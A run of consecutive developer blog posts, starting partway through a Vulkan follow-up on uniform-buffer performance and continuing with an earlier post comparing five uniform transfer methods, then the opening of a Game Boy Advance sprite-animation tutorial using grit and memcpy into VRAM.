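One step not shown above is turning the two raw timestamps into an actual duration. The values read back from the query pool (via vkGetQueryPoolResults) are in device ticks, and VkPhysicalDeviceLimits::timestampPeriod gives the number of nanoseconds per tick. A small sketch of just the conversion, with elapsedMilliseconds being a hypothetical helper name and the Vulkan readback itself left out:

```cpp
#include <cassert>
#include <cstdint>

// Converts two raw timestamp query values into milliseconds.
// timestampPeriodNs is assumed to come from
// VkPhysicalDeviceLimits::timestampPeriod (nanoseconds per tick).
double elapsedMilliseconds(uint64_t startTicks, uint64_t endTicks, float timestampPeriodNs)
{
    assert(endTicks >= startTicks);
    const double elapsedNs =
        static_cast<double>(endTicks - startTicks) * static_cast<double>(timestampPeriodNs);
    return elapsedNs / 1.0e6;
}
```

Here startTicks would be the value from query 0 and endTicks the value from query 1.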

If you recall, the frame time of each approach was measured in the last post as the following:

I re-ran this test, but this time used vkCmdWriteTimestamp to measure just the time it takes to add the primitives to the command queue and set up their uniform data:

This data is likely of questionable usefulness because of how light the entire application is on the GPU, but it’s interesting nonetheless. It suggests that the push constant and single buffer approaches are equal in how fast they are to execute on the GPU. This might mean that the frametime difference between them was mostly due to the added time it took to memcpy data into the buffers for the single buffer approaches.

The multi-buffer approaches are slower than the others in this measure as well, which makes sense given that even when submitting to the command buffer, the multi-buffer branches have to change which buffers are bound all the time. However, because of how simple our frame is, all the approaches are almost exactly as fast. If the above timing code is accurate, it means that all the larger differences we’re seeing in the frametime of the application are due to the cost of memory mapping, and memcpying our uniform data around.

Don’t Use _aligned_malloc

The next piece of feedback came from reddit user rhynodegreat, and it is directly related to the cost of memory mapping we just talked about. It was pointed out that since I was using memcpy to transfer data to a mapped buffer pointer, I didn’t need to be using _aligned_malloc for the original allocation. I admit this was a bit of cargo culting on my end. I originally figured out how to use dynamic uniform buffers from some example code I found online, and didn’t question the use of _aligned_malloc, since I had never used it before.

Luckily, removing it from my code was as simple as replacing any calls to it with a simple malloc call.

uniformData = (PrimitiveUniformObject*)_aligned_malloc(bufferSize, dynamicAlignment);

becomes

uniformData = (PrimitiveUniformObject*)malloc(bufferSize);

Everything still works with the above changes, but I was curious as to whether it had any performance implications, so I compared the DynamicUniformBuffer approach from earlier with the same approach using a regular malloc. I was going to show this in another graph, but I found no real performance difference between them, so it feels like (at least for this use case), whether to use _aligned_malloc or just malloc is a matter of preference / code portability.

How I felt when I saw a graph with all the bars the same height

However, while testing this, I realized that (for the Single Buffer Approach), I could remove the need for this allocation entirely with a very small amount of effort. If I could get the mapped pointer to the buffer before I pass this data to the draw function, I could save myself a lot of effort. So I rearranged things a bit to try that out:

//abbreviated code
uniformData = (PrimitiveUniformObject*)malloc(bufferSize);

int idx = 0;
char* uniformChar = (char*)uniformData;

for (const auto& prim : primitives)
{
    PrimitiveUniformObject puo;
    puo.model = VIEW_PROJECTION * (glm::translate(prim.pos) * glm::scale(prim.scale));
    puo.color = prim.col;

    memcpy(&uniformChar[idx * dynamicAlignment], &puo, sizeof(PrimitiveUniformObject));
    idx++;
}

Renderer::draw(uniformData, /* other args */);

Becomes:

//abbreviated code

int idx = 0;

char* uniformChar = Renderer::mapBufferPtr();

for (const auto& prim : primitives)
{
    PrimitiveUniformObject puo;
    puo.model = VIEW_PROJECTION * (glm::translate(prim.pos) * glm::scale(prim.scale));
    puo.color = prim.col;

    memcpy(&uniformChar[idx * dynamicAlignment], &puo, sizeof(PrimitiveUniformObject));
    idx++;
}

Renderer::unmapBufferPtr();

Renderer::draw( /* other args */);

The unmapBufferPtr() call can simply be omitted in order to keep things mapped all the time.
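Both versions above lean on dynamicAlignment without showing where it comes from. The usual approach is to round the size of the per-object struct up to the device’s minUniformBufferOffsetAlignment limit, so here is a minimal sketch of that plus the strided copy. PrimitiveUniform is a stand-in for PrimitiveUniformObject (a 4x4 matrix and a color, as plain floats), the 256 in the usage note is just an example alignment value, and a std::vector<char> can play the role of the mapped pointer when trying it out.

```cpp
#include <cassert>
#include <cstddef>
#include <cstring>
#include <vector>

// Stand-in for PrimitiveUniformObject: 64 bytes of matrix + 16 bytes of color.
struct PrimitiveUniform
{
    float model[16];
    float color[4];
};

// Rounds size up to the next multiple of alignment.
// alignment must be a power of two, which Vulkan guarantees for
// minUniformBufferOffsetAlignment.
inline size_t alignUp(size_t size, size_t alignment)
{
    assert(alignment != 0 && (alignment & (alignment - 1)) == 0);
    return (size + alignment - 1) & ~(alignment - 1);
}

// Writes each primitive into dst at a stride of dynamicAlignment bytes,
// the same pattern as the memcpy loop above. dst must have room for
// prims.size() * dynamicAlignment bytes.
inline void writePrimitives(char* dst,
                            const std::vector<PrimitiveUniform>& prims,
                            size_t dynamicAlignment)
{
    assert(dynamicAlignment >= sizeof(PrimitiveUniform));
    for (size_t i = 0; i < prims.size(); ++i)
    {
        std::memcpy(dst + i * dynamicAlignment, &prims[i], sizeof(PrimitiveUniform));
    }
}
```

With an 80 byte struct and an alignment of 256, alignUp gives a stride of 256 bytes, so object i lives at byte offset i * 256 in the buffer.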

I decided to compare the performance of the Single-Buffer approaches with these changes vs the timing data that I presented last time, and it appears that the above changes yield a modest speed up for all approaches except using push-constants, since they didn’t need the _aligned_malloc call in the first place.

Assuming my methodology for these tests is correct (this is outlined at the end of the post), the data points to at least a small performance improvement from removing that unnecessary memcpy, and cleaner code, since it avoids an unnecessary allocation, and copy.

Use Device-Local Memory

I liked this piece of feedback because it forced me to actually validate an assumption I made in the previous post: that data which gets 100% updated every frame likely doesn’t benefit from being device local. So I’m starting with that as my hypothesis.

For the most part, changing things to use device local memory was surprisingly easy. All it took was changing what buffer was getting mapped when I wanted to transfer uniform data, and then adding code to copy that data (now in a staging buffer) to the device local memory that the shaders ended up using. Given that the nuts and bolts of using a staging buffer are already excellently presented at vulkan-tutorial.com, I’m going to skip talking about that here. You can always check out the repo if you’re curious.

I updated the performance graph from the last post with timings using device local memory. I also included timings using vkTimestamps for the draw functions as well (again, only for the loop that created and submitted draw calls, since that’s what changed between different versions).

In 3D to show the really small values too

Turns out my hypothesis was wrong. Spectacularly wrong.

The huuuggeee increase in frametime for the multi-buffer versions caught me off guard. It’s so high that I’m wondering if I’m making another weird mistake in my implementation (please, spot my mistake in the renderer.cpp file), but I suppose it does make some sense, given that we’re asking the gpu to do 5000 copy buffer operations every frame in addition to everything else.

That being said, for the single buffer approach, using device-local memory pushed its average time per frame to the same speed as using push-constants, which is interesting, but I’m not sure I expect that to hold up given heavier loads (although I’m not sure which one would win in that case). Sounds like something to test in a later (more complex) project.

For now though, the message from this test is clear: use device-local memory for data which doesn’t get updated frequently (or at least, which doesn’t require a lot of copy buffer operations per frame).

Last note - the two graphs were generated in different runs of testing, so the numbers don’t 100% add up between the two of them, but they’re close enough for me to feel comfortable drawing early conclusions about how to use Vulkan, so I’m not losing any sleep over it.

Re-use Command Buffers

The last bit of advice that I wanted to look into was that I am wasting time recreating command buffers that are mostly identical every frame. The only time the command buffer actually changes is when a brick gets removed. Since all the tests that I’m running involve a static scene anyway, I’m going to work around that here by just having logic move the hit bricks off-screen, instead of removing them. I definitely couldn’t get away with changes like this on a real project, but it works well enough to get some performance data in this case.

I made a few changes to the project so that the actual draw function doesn’t record any commands, it simply submits the pre-recorded command buffers that are generated at the beginning of the project. Unsurprisingly, this is pretty good for performance:

You can't reuse a command buffer with push constants (as far as I know)

From the graph, you can see how much this improves the performance of basically everything. In fact, compared to everything else that I tried, reusing command buffers was by far the single most impactful thing for the performance of the program. It literally made almost everything (except mapping a per object buffer every frame) faster than the push-constant approach, which so far has been the most performant way to do things in every test. I assume that even a less aggressive buffer re-use strategy would pay dividends in a more complex project, and I’m certainly going to be structuring future projects to take advantage of this as much as possible.

I also decided to test to see how these improvements fared when using device-local memory:

Maybe anticlimactically (since this is my last graph), for the single buffer approaches this did basically nothing. For the multi-buffer approaches, the overhead of doing a vkCmdCopyBuffer for each object every frame still hit performance so hard that reusing the command buffers really didn’t matter. The lesson to gain from all this: pay attention to how often you update a chunk of data before deciding to make it device-local, since that could be doing more harm than good.

I would have taken Vulkan timestamp measurements of all of this too, but after recording the first set of data I realized that I had changed the first timestamp call to VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT to test something out earlier and had forgotten to change it back. That made any timestamp data I got here completely useless for comparing against previous data. I’m also sick to death of this Breakout clone, so I decided to just press on and omit those measurements.

Conclusion

That’s all for today! When I started making my little Breakout clone, I had no idea that it was going to turn out to be so informative! That being said, I need to move on now. There were some bits of advice that I got that I really liked, that I didn’t end up trying out here simply to save my sanity. This code was never written to be anything other than throwaway code, and it’s time to throw it all out and start fresh. Who knows, maybe my next foray into vulkan will even have textures!

If you spot any errors (there’s likely a ton) in the above code, or just want to say hi, I’m always around on Twitter! I’ve learned more from people pointing out my mistakes in the past week than I did actually building this thing from scratch, so keep the feedback coming!

Appendix: Testing Methodology
In case reviewing testing methods is your thing, here's how I got the numbers in all the graphs in this post:

When testing, the time step of the game logic was set to 0 (rather than deltaTime), so that any variations in frame rate from things like removing bricks, or handling game restart logic were eliminated. Then, the game was run for 20k frames, reporting the average frametime after every 5k frames. This gave me 4 average frame time numbers. I discarded the highest and lowest of these numbers, and then averaged the two remaining values to produce an average frametime for the test.

I monitored my CPU and GPU temp with the Cam Web App, and let both of them return to their resting temp between tests (61 and 66 C respectively), and made sure that the same applications (and only those applications) were running alongside the breakout program.

I repeated this test 2 more times, at different times of the day (after using the laptop to do other tasks), which gave me 3 frametime averages (1 per run of the test). I chose the median of the three to present in the graph above.
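If it helps to see that bookkeeping as code, here’s a minimal sketch of it. The function names are hypothetical (this isn’t lifted from the repo), and it assumes exactly four 5k-frame averages per run and three runs per test, like I described above.

```cpp
#include <algorithm>
#include <array>

// Hypothetical helper: takes the four 5k-frame averages from one run,
// drops the highest and lowest, and averages the two that remain.
double trimmedAverage(std::array<double, 4> samples)
{
    std::sort(samples.begin(), samples.end());
    return (samples[1] + samples[2]) / 2.0;
}

// Hypothetical helper: picks the median of the three per-run results,
// which is the number that ends up in the graph.
double medianOfThree(double a, double b, double c)
{
    return std::max(std::min(a, b), std::min(std::max(a, b), c));
}
```

Using the median across runs (rather than another average) means a single odd run can’t drag the reported number around.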

Unless vkCmdWriteTimestamp data was included in the graph, the calls to vkCmdWriteTimestamp were removed via an ifdef.

Finally, all tests were done in Release builds, without a debugger attached or any validation layers turned on, and connected to a wall outlet to prevent any kind of throttling on battery from interfering with anything.

All the source for everything is on github. I would love for someone to compile everything and run a similar test to see if the results for my GPU can be replicated on someone else's hardware.

Comparing Uniform Data Transfer Methods in Vulkan

2017-08-13T00:00:00+00:00

Lately I’ve been trying to wrap my head around Vulkan. As part of that, I’ve been building a small Breakout clone (github) as a way to see how the pieces of the API fit together in a “real” application.

When I’m starting to learn a new graphics API, the thing that I try to focus on is getting used to all the different ways to send data from the CPU to the GPU. Since my Breakout clone didn’t have textures, or meshes (really) to speak of, that left the per frame uniform data for each object on screen.

The "Playable" version of the Breakout Clone

Looking at a few vulkan examples I could find, and taking a quick glance through the API, I settled on 5 different options for getting my uniform data sent to the card:

Using push-constants
Using 1 VkBuffer and keeping it mapped all the time
Using 1 VkBuffer and mapping/unmapping per frame
Using multiple VkBuffers, and keeping them all mapped
Using multiple VkBuffers, and mapping/unmapping every frame

All the guidelines out there are pretty clear when they say to use push-constants for data that has to change on a per-object basis every frame, but given that push constants have a size limit, it made sense to give each of the above approaches a whirl, since they conceivably all will have their place in a large application.

So, in the interest of whirling, I put a branch in my repo for each, and then tracked the average frame-time of each to see how much faster or slower each approach was.

However, Breakout is really not a good test for a GTX 1060, and with 500 blocks on screen, I was running every test at < 1 ms per frame. The times were so small, that even between runs of the exact same version of the program, the results were too varied to be much use (since even a change in measured time of 1/100th of an ms became significant). To make things a bit easier to work with, I added a mode to the game which rendered 5000 blocks at a time.

which admittedly looked sorta ridiculous

This produced much more stable results (i.e. they could be reproduced in multiple runs), which I want to provide here to give context to the rest of this blog post.

The big takeaway here is that mapping memory is a really slow process, so if you need something mapped, keep it that way for as long as you can. This is likely not news to anyone except me, since I’ve been living in mobile engine land for my whole career and really haven’t had to worry about that. Oh, and the guides were right, you should totally use push constants when you can. If you can’t use them, there’s a slight advantage to packing multiple objects’ worth of data into a single buffer, vs giving every object its own.

With that in mind, I want to walk through the implementation details of each approach, because I wish something like that had existed before I started down this rabbit hole. If you were only interested in the performance results, you can stop reading and go about your life :) If you’re scratching your head as to how to do one or more of these things, join me below!

Preliminary info

In order to make much sense of the code I’m going to share, it will be helpful to understand that my code stores uniform data that will be sent to the GPU in a struct called PrimitiveUniformObject, which directly maps to the layout of the uniform data in the shader:

//CPU
struct PrimitiveUniformObject
{
    glm::mat4 model;
    glm::vec4 color;
};

//glsl
layout(set = 0, binding = 0) uniform PER_OBJECT
{
    mat4 mvp;
    vec4 col;
} obj;

Hopefully that makes sense! I’m going to try to keep all the snippets I share abbreviated enough that you otherwise don’t need to care about how I structured things, but I couldn’t get around telling you about this tiny bit.

I’m also going to assume that you’re at least at the level I was when I started this project, that is, you’ve gone through vulkan-tutorial.com, and therefore understand how to allocate a VkBuffer. If you aren’t there yet, click the link to the tutorial and come back in a few hours. Things will make much more sense.

Multiple, Unmapped Buffers

Let’s start by talking about the approach that felt most intuitive for me right off the bat: giving each drawable entity (which my code calls a Primitive) its own VkBuffer to store its own uniform data, and a VkDescriptorSet to know about that buffer:

struct PrimitiveInstance
{
    vec3 pos;
    vec3 scale;
    vec4 col;

    VkBuffer uniformBuffer;
    VkDescriptorSet descSet;
    VkDeviceMemory bufferMem;
    int meshID;
};

My project was simple enough (and my gpu forgiving enough) that I could get away with doing a VkDeviceMemory allocation for every primitive. On a larger project you’d have to do something smarter than that.

Since the entirety of the data stored in the VkBuffer is going to get updated every frame, and we’re going to update the data with a single write to the buffer data, I allocated the VkBuffers with host coherent memory, which makes things nice and easy when it’s time to update the data:

//abbreviated code:
PrimitiveUniformObject puo;
puo.model = VIEW_PROJECTION * (glm::translate(pos) * glm::scale(scale));
puo.color = col;

void* udata = nullptr;
vkMapMemory(device, bufferMem, 0, sizeof(PrimitiveUniformObject), 0, &udata);
memcpy(udata, &puo, sizeof(PrimitiveUniformObject));
vkUnmapMemory(device, bufferMem);

Since we’ve already taken a look at the performance graph, we know that mapping/unmapping the buffer for each Primitive, every frame, is a performance killer. We can work around that with the next approach and get much better results.

Multiple, Always Mapped Buffers

To make the multiple buffer approach faster, all we need to do is to add one more variable to the PrimitiveInstance struct:

struct PrimitiveInstance
{
    vec3 pos;
    vec3 scale;
    vec4 col;

    VkBuffer uniformBuffer;
    VkDescriptorSet descSet;
    void* mapped;
    int meshID;
};

In this approach, when a primitive was created, the memory for its buffer was immediately mapped, and the address stored in the mapped pointer above. Note that the PrimitiveInstance struct doesn’t contain a PrimitiveUniformObject; those get created per frame by combining the easier to work with variables we have here.

//abbreviated code:
PrimitiveUniformObject puo;
puo.model = VIEW_PROJECTION * (glm::translate(pos) * glm::scale(scale));
puo.color = col;
memcpy(mapped, &puo, sizeof(PrimitiveUniformObject));

Then, all that’s needed is to submit each object’s descriptorSet to the rendering function, and pass the right one to vkCmdBindDescriptorSets at the right time. As you saw in the graph earlier, this approach was the slowest of the three approaches that didn’t involve mapping/unmapping data every frame.

In the above code, I don’t need to call vkFlushMappedMemoryRanges or similar because the buffer memory was allocated with the VK_MEMORY_PROPERTY_HOST_COHERENT_BIT flag set. Without that, you’d have to manually tell Vulkan when you changed the data at that pointer. Host coherent memory is very likely slower than the alternative, but for buffers which are completely changed every frame, I’m not sure there’s much of a difference.

I haven’t tested out anything using non-host coherent memory though, so I reserve the right to be totally wrong about that.

Single Dynamic Uniform Buffer

The second approach I tried was to allocate a single VkBuffer which was large enough to store the uniform data for every object inside it, treating the buffer’s contents as an array of uniform data. Since in my case, I was submitting an array of mesh ids alongside the uniform data, this meant that I didn’t need to store any extra info in the primitive instance struct. As long as both arrays were in the same order, the right mesh would get drawn with the right uniform data.

struct PrimitiveInstance
{
    vec3 pos;
    vec3 scale;
    vec4 col;
    int meshID;
};

One caveat to this approach is that each object’s data inside the VkBuffer has to start at an offset that is a multiple of your GPU’s minUniformBufferOffsetAlignment limit. In my case, I was already getting my VkPhysicalDeviceProperties when I initialized everything, so that value was easily accessible. With that alignment value, you can then figure out exactly how big your VkBuffer has to be:

size_t deviceAlignment = deviceProps.limits.minUniformBufferOffsetAlignment;
size_t uniformBufferSize = sizeof(PrimitiveUniformObject);
size_t dynamicAlignment = (uniformBufferSize / deviceAlignment) * deviceAlignment + ((uniformBufferSize % deviceAlignment) > 0 ? deviceAlignment : 0);

size_t bufferSize = primitiveCount * dynamicAlignment;
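The round-up math above is a bit dense, so here’s the same idea as a small standalone sketch. The helper names are made up for illustration, and the only assumption is that the alignment is non-zero. Each object gets padded out to the next multiple of the alignment, and the buffer needs one of those padded slots per object.

```cpp
#include <cstddef>

// Round `size` up to the next multiple of `alignment` (alignment must be non-zero).
constexpr std::size_t alignUp(std::size_t size, std::size_t alignment)
{
    return ((size + alignment - 1) / alignment) * alignment;
}

// Total bytes needed for `count` objects, each padded out to the aligned stride.
constexpr std::size_t dynamicBufferSize(std::size_t objectSize,
                                        std::size_t alignment,
                                        std::size_t count)
{
    return alignUp(objectSize, alignment) * count;
}
```

For example, an 80 byte struct on a device that reports an alignment of 256 ends up using 256 bytes per object, so 5000 objects need 1,280,000 bytes.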

Once you know the alignment you need, you can use Windows’ _aligned_malloc function to actually get an aligned block of memory, which you can then memcpy into the VkBuffer’s mapped pointer.

uniformData = (PrimitiveUniformObject*)_aligned_malloc(bufferSize, dynamicAlignment);

Since the PrimitiveUniformObject struct itself has no notion of alignment, you have to space your writes into buffer memory accordingly:

//abbreviated code

int idx = 0;
char* uniformChar = (char*)uniformData;

for (const auto& prim : primitives)
{
    PrimitiveUniformObject puo;
    puo.model = VIEW_PROJECTION * (glm::translate(prim.pos) * glm::scale(prim.scale));
    puo.color = prim.col;

    memcpy(&uniformChar[idx * dynamicAlignment], &puo, sizeof(PrimitiveUniformObject));
    idx++;
}
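If you want to convince yourself that the spacing works without involving the GPU, here’s a self-contained sketch of the same idea. It swaps in a std::vector of bytes for the aligned allocation and a stand-in struct for PrimitiveUniformObject, and both function names are hypothetical. It also assumes the stride is at least as big as the struct.

```cpp
#include <cstddef>
#include <cstring>
#include <vector>

// Stand-in for PrimitiveUniformObject (plain floats instead of glm types).
struct UniformStandIn
{
    float model[16];
    float color[4];
};

// Writes each object at i * stride, leaving the padding bytes zeroed.
// Assumes stride >= sizeof(UniformStandIn).
std::vector<unsigned char> packWithStride(const std::vector<UniformStandIn>& objects,
                                          std::size_t stride)
{
    std::vector<unsigned char> bytes(objects.size() * stride, 0);
    for (std::size_t i = 0; i < objects.size(); ++i)
    {
        std::memcpy(bytes.data() + i * stride, &objects[i], sizeof(UniformStandIn));
    }
    return bytes;
}

// Reads one object back out, starting at the given byte offset.
UniformStandIn readAt(const std::vector<unsigned char>& bytes, std::size_t byteOffset)
{
    UniformStandIn out;
    std::memcpy(&out, bytes.data() + byteOffset, sizeof(UniformStandIn));
    return out;
}
```

The byte offset you’d pass to readAt for object i is i * stride, which is the same value that gets handed to Vulkan as the dynamic offset at bind time.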

Likewise, when you allocate your VkBuffer, you’re going to want to request a buffer of size dynamicAlignment * number of primitives, and you’ll want to make sure the descriptor set that points at it uses the VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER_DYNAMIC descriptor type (both in the descriptor set layout binding and in the descriptorPool it gets allocated from).

With all of that set up, you can then copy your frame data to the uniform buffer like so:

void* udata = nullptr;
vkMapMemory(device, buffer.deviceMemory, 0, dynamicAlignment * PRIM_COUNT, 0, &udata);
memcpy(udata, uniformData,  dynamicAlignment * PRIM_COUNT);
vkUnmapMemory(device, buffer.deviceMemory);

And finally, you need to pass an offset in your calls to vkCmdBindDescriptorSets. This offset tells vulkan where in the single buffer’s data to grab each object’s individual uniform data. Since it’s a byte offset, you’ll need to have the dynamicAlignment value we calculated earlier handy:

for (int i = 0; i < PRIM_COUNT; ++i)
{
    uint32_t dynamicOffset = i * static_cast<uint32_t>(dynamicAlignment);
    vkCmdBindDescriptorSets(commandBuffer,
                            VK_PIPELINE_BIND_POINT_GRAPHICS,
                            pipelineLayout,
                            0,
                            1,
                            &descriptorSet,
                            1,
                            &dynamicOffset);

    // rest of per object draw code goes here
}

That should be enough to get you going, but we can make this faster too.

Always Mapped Single Buffer

Just like the multi-buffer approach, we can speed up the single buffer solution by keeping that buffer always mapped. Since we only have one buffer, this is a trivial change to the code. If you wanted, you could even just do it inside your update function like this:

static void* udata = nullptr;

if (!udata)
{
    vkMapMemory(device, buffer.deviceMemory, 0, dynamicAlignment * PRIM_COUNT, 0, &udata);
}
memcpy(udata, uniformData,  dynamicAlignment * PRIM_COUNT);

Of course, you probably shouldn’t do it like this, but there’s no performance reason not to, so I’m going to back away slowly from discussing code quality issues now.

Push Constants

To finish things off, let’s take a look at our big winner from the performance tests. Push constants are great for data that updates this frequently because you don’t actually need to allocate any buffers for it. This also means that we need to do a few things differently from the previous 4 approaches we’ve looked at, like changing how we declare our uniform data struct in glsl:

layout(push_constant) uniform PER_OBJECT
{
    mat4 mvp;
    vec4 col;
} obj;

Next, instead of creating any VkBuffers, when we create our pipeline layout, we need to specify a push constant range:

VkPushConstantRange pushConstantRange = {};
pushConstantRange.offset = 0;
pushConstantRange.size = sizeof(PrimitiveUniformObject);
pushConstantRange.stageFlags = VK_SHADER_STAGE_VERTEX_BIT;

VkPipelineLayoutCreateInfo pipelineLayoutInfo = {};
//..other init code here
pipelineLayoutInfo.pSetLayouts = &descriptorSetLayout; // still need this
pipelineLayoutInfo.pushConstantRangeCount = 1;
pipelineLayoutInfo.pPushConstantRanges = &pushConstantRange;

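Like the comment above says, my code still passes a descriptorSetLayout here even when using push constants. As far as I know, Vulkan itself only needs the push constant range to know how that data is laid out (a pipeline layout with zero set layouts is valid), so treat that line as a leftover of how my project was structured rather than a hard requirement. Either way, you don’t need to make any descriptorSets to pass that data to the shader.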

Instead, where you might otherwise call vkCmdBindDescriptorSets, you do the following:

for (int i = 0; i < PRIM_COUNT; ++i)
{
    vkCmdPushConstants(
        commandBuffer,
        pipelineLayout,
        VK_SHADER_STAGE_VERTEX_BIT,
        0,
        sizeof(PrimitiveUniformObject),
        &uniformData[i]);

    // rest of per object draw code goes here
}

That should cover it (assuming I haven’t missed a step). Given the option, push constants feel a lot cleaner for passing small bits of data to shaders, which makes sense given that they’re tailor made for that purpose. It’s nice when the most performant option is also the easiest one to work with.
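Since the whole reason for trying the other four approaches was that push constants have a size limit, it’s worth checking that your per-object data actually fits. Here’s a small sketch of that check. It uses a stand-in struct with plain float arrays instead of glm types, and the 128 byte figure is the minimum that Vulkan guarantees for maxPushConstantsSize; your device may well report more in its VkPhysicalDeviceLimits. The names are hypothetical, not part of my repo.

```cpp
#include <cstddef>

// Stand-in for PrimitiveUniformObject: a 4x4 matrix plus a 4 component colour.
struct PushConstantStandIn
{
    float mvp[16];
    float col[4];
};

// Minimum push constant space every Vulkan implementation has to provide.
constexpr std::size_t GUARANTEED_PUSH_CONSTANT_BYTES = 128;

// True if `bytes` of data fits within `limit` bytes of push constant space.
constexpr bool fitsInPushConstants(std::size_t bytes,
                                   std::size_t limit = GUARANTEED_PUSH_CONSTANT_BYTES)
{
    return bytes <= limit;
}

// Catch it at compile time if the struct ever outgrows the guaranteed space.
static_assert(fitsInPushConstants(sizeof(PushConstantStandIn)),
              "per-object data no longer fits in the guaranteed push constant space");
```

In a real application you’d pass the limit the device actually reports as the second argument instead of relying on the guaranteed minimum.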

Conclusion

That wraps up the implementation details for everything. To get a sense of when to use each approach, I recommend you check out NVidia’s Vulkan Shader Resource Binding page.

I’m a complete beginner with Vulkan, so if you see anything weird or just plain wrong in this post, please send me a message on Twitter, I would love to hear from you! Likewise, if there’s a resource out there that’s helped you get a handle on Vulkan, please pass it along.

Until next time!

Appendix: Testing Methodology
In case reviewing testing methods is your thing, here's how I got the numbers in all the graphs in this post:

All the source for everything is on github, I would love for someone to compile everything and run a similar test to see if the results for my GPU can be replicated on someone else's hardware.

GBA By Example - Sprite Animation

2017-06-02T00:00:00+00:00

(Note: This is Part 5 of my GBA by Example series. A list of my other GBA tutorials can be found here)

Whew, it’s been awhile! I know I said I’d put up another tutorial in 2 weeks…but that didn’t happen. Between shipping a game at work, and diving into Vulkan, my interest for GBA stuff definitely took a back seat. Lesson learned, don’t put a deadline on blog posts :)

So far, I’ve gotten by with doing the bare minimum for anything art related, but our end products have never been too exciting. So this article is going to fix that. First, we’re going to walk through the process of grabbing some (public domain) sprites off of OpenGameArt.org, importing those into our game, and then using them to animate a character as we move them around the screen.

At the end of the article, we should have something that looks like this:

Wooooo! Finally something that kinda looks like a game! Let’s get this train rolling.

Getting Our Assets

All the character sprites we’re working with today come from this asset on OpenGameArt. I chose these sprites not only because they had a sane palette and sprite size (which is hard to find, since not a lot of people are making assets with the GBA’s limitations in mind), but also because they’re public domain, so I can use them in this article without the chance of getting sued. woohoo!

It also means you can use these sprites in your own projects (even commercial projects), which is also pretty cool.

I took the liberty of extracting only the character sprites we’re going to use today into their own spritesheet, which you can grab below:

This should save us having to do any pixel editing for this blog post, but we will have to export these sprites into a useable format for our game. To do that, we’re going to use a nifty open source tool called Grit. I mentioned this tool in a previous post, but today I’m going to walk through using it as well. If you don’t have that downloaded already, grab it now and let’s get started.

Exporting Sprite Data

Grit is a tool for taking bitmap images, and exporting them into .h/.c files (among other potential types of files), for consumption by a GBA game. We need to export each of our character sprites using it, and then manually load that data in our program like we’ve been doing before.

I’m going to use the GUI version of grit, which you can find in the program folder, titled “wingrit.” There’s a command line app as well, but I haven’t needed to use it yet (and if I can avoid memorizing more command line args, I will), so if you’re following along with me, open wingrit, and you should see the following:

Simply open our sprite sheet image (with File->Open), and you should see it in the GUI window. Once you see the image, we need to open the export window, so go to View->GBAExport, and you should see this rather intimidating window pop up:

Like the window itself says, don’t panic :) there’s only a few things we need to do. First, we need to make sure that we’ve set the export to 8 bits per pixel; you’ll find that option in the top right of the window. Next, tell it to export .h/.c files, so in the “File” section, set the type to “C (*.c)”. You’ll also want to set where the exported files should go in the large text field above the type dropdown. Then, we need to set the size of our sprite, which, for all of our sprites here, means setting the “Meta/Obj” section to square, size 2, which corresponds to 16x16 pixel sprites.

Finally, I always export the data as unsigned 32 bit integers. Whenever I use a smaller data type I end up running into weirdness with memcpy at some point. Since we aren’t going to be modifying the raw data anyway, the fact that storing all the data as 32 bit integers makes it harder for humans to read is a non-issue. So set your export type to “u32”.

Once all that is set up, click ok, and you should see a success popup.

One of the coolest parts about grit is its ability to export multiple sprites from a sprite sheet. Since we told Grit that our sprites were 16x16 pixels in size, it was smart enough to be able to parse the sprite sheet correctly and give us .h/.c files with the data in a nicely useable format. So don’t worry about needing to run grit for each individual sprite, it’s already done all the work for us.
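If you’re curious how much data that export works out to per frame, here’s a rough sketch of the arithmetic. It assumes the settings above (8bpp, 16x16 sprites, u32 output), and the constant and function names are mine, not something grit generates.

```cpp
#include <cstddef>
#include <cstdint>

// GBA tiles are 8x8 pixels; at 8 bits per pixel that's 1 byte per pixel.
constexpr std::size_t TILE_SIDE_PIXELS = 8;
constexpr std::size_t BYTES_PER_8BPP_TILE = TILE_SIDE_PIXELS * TILE_SIDE_PIXELS;

// Bytes used by one square 8bpp sprite frame with the given side length in pixels
// (the side length is assumed to be a multiple of 8).
constexpr std::size_t bytesPerFrame(std::size_t spriteSidePixels)
{
    return (spriteSidePixels / TILE_SIDE_PIXELS) *
           (spriteSidePixels / TILE_SIDE_PIXELS) *
           BYTES_PER_8BPP_TILE;
}

// The same size measured in 32 bit words, which is how a u32 export stores it.
constexpr std::size_t wordsPerFrame(std::size_t spriteSidePixels)
{
    return bytesPerFrame(spriteSidePixels) / sizeof(std::uint32_t);
}
```

So each 16x16 frame is 4 tiles, or 256 bytes, or 64 entries in the exported u32 array.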

Importing Sprite Data

Now that we have our sprite data exported, we need to get it into VRAM. This should look familiar if you’ve been following along with previous articles. All we need to do is a few memcpys and we’re good to go:

#include "charsprites.h"
#include <string.h>
#include "gba.h"

int main()
{
    memcpy(&MEM_TILE[4][0], charspritesTiles, charspritesTilesLen);
    memcpy(MEM_PALETTE, charspritesPal, charspritesPalLen);

}

One thing that is different this week is that I’ve moved all the memory address defines, and typedefs that we need to use to an include file called gba.h . This is mostly for my sanity, and to keep my code samples cleaner. You can grab this include file here. Everything that is in this include has been shown explicitly in a previous post I’ve made, so don’t worry about parsing through it, unless you see something in a code sample that you don’t remember.

Ok, now that we have our data into video memory, we also need to set up our application’s Display Control register so it knows how to interpret it:

REG_DISPLAYCONTROL =  VIDEOMODE_0 | BACKGROUND_0 | ENABLE_OBJECTS | MAPPINGMODE_1D;

This should look identical to the last time we used sprites, because it is ;) but as a refresher:

VIDEOMODE_0 is a tiled video mode, meaning that we’re using sprites instead of drawing directly to the screen buffer
BACKGROUND_0 enables the 0th background. I’m going to use this to colour the background of our game
ENABLE_OBJECTS is the flag that tells our program to use sprites
MAPPINGMODE_1D means that our sprites are stored in a 1 Dimensional array. Grit takes care of this for us.

Wonderful! To finish off our setup, let’s add our game loop. Remember that returning from a GBA program’s main function is undefined, so our game loop needs to never terminate. For now, let’s also add a call to our hacky little vsync function in the main loop. This function is defined in gba.h, but is the same as every other post I’ve made.

Put together, our starting point looks like this:

#include "charsprites.h"
#include <string.h>
#include "gba.h"
int main()
{

    memcpy(&MEM_TILE[4][0], charspritesTiles, charspritesTilesLen);
    memcpy(MEM_PALETTE, charspritesPal, charspritesPalLen);

    REG_DISPLAYCONTROL =  VIDEOMODE_0 | BACKGROUND_0 | ENABLE_OBJECTS | MAPPINGMODE_1D;

    while(1)
    {
        vsync();
    }

    return 0;
}

